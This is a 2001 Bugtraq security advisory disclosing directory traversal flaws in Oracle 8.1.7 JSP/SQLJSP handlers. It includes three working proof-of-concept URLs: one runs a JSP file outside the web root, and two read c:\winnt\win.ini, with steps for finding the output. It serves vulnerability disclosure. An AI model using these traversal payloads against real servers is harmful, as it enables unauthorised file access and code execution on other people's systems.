Bugtraq mailing list archives
Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root
From: Georgi Guninski <guninski () GUNINSKI COM>
Date: Mon, 22 Jan 2001 17:35:55 +0200
Georgi Guninski security advisory #36, 2001 Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root Systems affected: Oracle JSP/SQLJSP handlers, installed by default Oracle 8.1.7 Windows 2000 Have not tested on other versions but they may be vulnerable Risk: High Date: 22 January 2001 Legal Notice: This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Description: It is possible to view files outside the web root. Also possible is execution of .JSP files outside the web root in the same partiotion as the web server's root. Details: I guess there are at least 2 vulnerabilities with JSP/SQLJSP handlers. Basically these are directory traversal vulnerabilities. 1) The following URL: --------------------------------------- http://oraclehost/servlet//..//../o.jsp --------------------------------------- will execute c:\o.jsp if there is such file. As a side effect this shall create the directory C:\servlet\_pages\_servlet and shall put in it the java source and .class file of o.jsp 2) The following URL: ------------------------------------------------------------- http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini ------------------------------------------------------------- shall read c:\winnt\win.ini. It is normal to receive an error to this request. To see the result go to: http://oraclehost/_pages and look in the directories for .java files containing "win" 3) The following URL: ----------------------------------------------------------------- http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini ----------------------------------------------------------------- shall read c:\winnt\win.ini. It is normal to receive an error to this request. To see the result go to: http://oraclehost/_pages and look in the directories for .java files containing "win" Note: all urls were tested with Netscape 4.76 or direct HTTP requests. Do not work with IE. Vendor status: Oracle was contacted on 18 January 2001. Regards, Georgi Guninski http://www.guninski.com
Current thread:
- Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root Georgi Guninski (Jan 22)